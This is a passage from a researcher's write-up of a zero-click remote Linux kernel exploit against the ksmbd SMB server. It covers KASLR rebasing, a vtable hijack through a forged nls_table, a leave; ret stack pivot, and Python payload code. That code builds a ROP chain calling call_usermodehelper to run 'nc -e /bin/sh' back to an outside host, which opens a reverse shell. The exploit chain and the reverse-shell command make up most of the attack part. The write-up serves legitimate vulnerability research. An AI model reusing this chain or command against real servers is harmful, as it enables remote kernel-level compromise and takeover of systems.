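STATIC_SYMBOL = 0xffffffff82fcdd00  # static address of the leaked data symbol


def kaslr_base_from_leak(leaked: int) -> int:
    """Subtract the symbol's fixed offset from the base to recover the slid base."""
    return leaked - (STATIC_SYMBOL - STATIC_BASE)


def rebase(static_addr: int, base: int) -> int:
    """Translate an address from the unslid image into the running kernel."""
    return base + (static_addr - STATIC_BASE)


leaked = 0xffffffff9dfcdd00  # made-up runtime value of the leaked pointer
base = kaslr_base_from_leak(leaked)

print(hex(base))
print(hex(rebase(0xffffffff810f4533, base)))
print(hex(leaked & 0xffff))
```

Every gadget and symbol address then only needs its static address from the target kernel image, since the slide is a single constant.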
Our end goal is to just call call_usermodehelper to pop a reverse shell and put the kernel thread into infinite sleep with msleep in the ROP chain.
With the arbitrary free, we can reclaim the misaligned chunk and overwrite the target ksmbd_conn object with a large enough ksmbd request to go into kmalloc-1k. The data we control has to start a bit further into the request because earlier parts of the payload get overwritten (perhaps by tcp sk_buff processing?).
Initially, I hijacked the local_nls pointer to redirect to a vtable (forged upon the ksmbd_conn object) where the function pointer had the value of 0x1337babebaadbeef. The kernel crash showed the following:
    [  209.080442] RAX: 1337babebaadbeef RBX: 0000000000000000 RCX: ffff888102d97b00
    [  209.084157] RDX: 0000000000000006 RSI: ffffc90000043db2 RDI: 0000000000000066
    [  209.087849] RBP: ffff888102d97b00 R08: ffff888102d97c00 R09: 0000000000000052
    [  209.091570] R10: 000000000000000a R11: d9b8d6dba644bded R12: ffff888102f70052
    [  209.095254] R13: 0000000000000008 R14: 0000000000000010 R15: 0000000000000000
In this case, the target for the arbitrary free was 0xffff888102d97a40, so we control the contents that rbp, rcx, and r8 point to (potentially at an offset). The rbp and rcx registers also point to the base of the nls_table object we forged.
To successfully ROP, we would have to stack pivot into the misaligned chunk with our controlled data. These days, finding good kernel gadgets with traditional ROP chain tooling like rp++ or ROPGadget can be frustrating due to runtime patching and micro-architectural side-channel mitigations - I usually just resort to using objdump. Luckily for us here, we control rbp so we can just rely on a leave; ret gadget to pivot into our controlled data. Here is how I laid out the ROP chain:
    cmd_base = target + 0x168
    cmd = [b'/usr/bin/nc.traditional\x00', b'-e\x00', b'/bin/sh\x00', b'ctfi.ng\x00', b'16549\x00']
    cmd_argv = b''.join(
        map(p64, (cmd_base + offset for offset in accumulate([0] + [len(x) for x in cmd[:-1]])))
    )

    evil_nls = (p64(0x4141414141414141) + p64(pop_rdi) + p64(leave_ret) + p64(pop_rdi) + p64(cmd_base) +
                p64(pop_rsi) + p64(target + 0x138) + p64(pop_rdx) + p64(envp) + p64(pop_rcx) + p64(0) +
                p64(call_usermodehelper) + p64(pop_rdi) + p64(0x7fffffff) + p64(msleep) +
                cmd_argv + p64(0x0) + b''.join(c for c in cmd))

    payload = (b'\x68' * (0x4+8*11) + evil_nls.ljust(0x1c0-0x68-8*11, b'\x68') +
               kmalloc1k_leak[:0x58] + p64(target+0xc0) + kmalloc1k_leak[0x60:0x238-0x70])
    log.info(f'payload len: {hex(len(payload))}')

    log.info('triggering arb free')
    # free preauth_hash with authentication path
    conns[overflowed_conn]._SMBConnection.login_finish()

    try:
        leaker.setInfo(
            tid, fid,
            inputBlob=payload,
            infoType=SMB2_0_INFO_FILE,
            fileInfoClass=SMB2_FULL_EA_INFO
        )
    except:
        pass

    log.info('vtable should be hijacked')
    conns[target_conn]._SMBConnection.login_finish()
Then, in the last line, we just attempt the second stage of session setup on the corrupted ksmbd_conn object to trigger the ROP chain and pop a reverse shell!
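One detail of the layout that is easy to miss is how the argument vector is built with accumulate: each pointer is the base address of the string area plus the running total of the preceding string lengths, and the table is closed by a NULL pointer before the strings themselves. The sketch below reproduces just that bookkeeping with harmless strings and a made-up address; build_pointer_table is a hypothetical helper, not part of the exploit.

```python
import struct
from itertools import accumulate


def build_pointer_table(strings_addr: int, strings: list[bytes]) -> bytes:
    """Return a NULL-terminated table of pointers followed by the packed strings.

    `strings_addr` is the address at which the first string will live.
    """
    offsets = accumulate([0] + [len(s) for s in strings[:-1]])
    table = b"".join(struct.pack("<Q", strings_addr + off) for off in offsets)
    return table + struct.pack("<Q", 0) + b"".join(strings)


strings = [b"/bin/echo\x00", b"hello\x00", b"world\x00"]
blob = build_pointer_table(0x1000, strings)

pointers = struct.unpack_from("<4Q", blob)
print([hex(p) for p in pointers])
```

For the table to be valid, the caller has to place the blob so that the strings really land at strings_addr, which is why the chain above derives both the table address and the string base from the same target value.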
The whole exploit can be found here.
There are some limitations though. The last stage is unstable on multi-core setups due to per-CPU slabs. The corrupted connections must remain alive, and some commands will cause the kernel to crash due to the corrupted heap. In a real world exploit, one would have to spend time to clean up the kernel after receiving a reverse shell (if that's what they even want) for post-exploitation stability and persistence. I did not really spend any time attempting those ideas as this was meant as just a research exercise :)
Overall, this was my first attempt at a kernel network 0-click exploit. ksmbd isn’t very commonly deployed, but this was still a really fun exercise - hopefully I can eventually find my magnum opus of an exploit! Thank you to syst3mfailure.io for the support during this experience and to the rest of the Crusaders of Rust security research group for feedback on this article. Thank you also to the MATCHA group at MIT CSAIL for the opportunity of a post-grad summer of kernel security research. As always, feel free to let me know of any questions, concerns, corrections, inquiries, or anything else.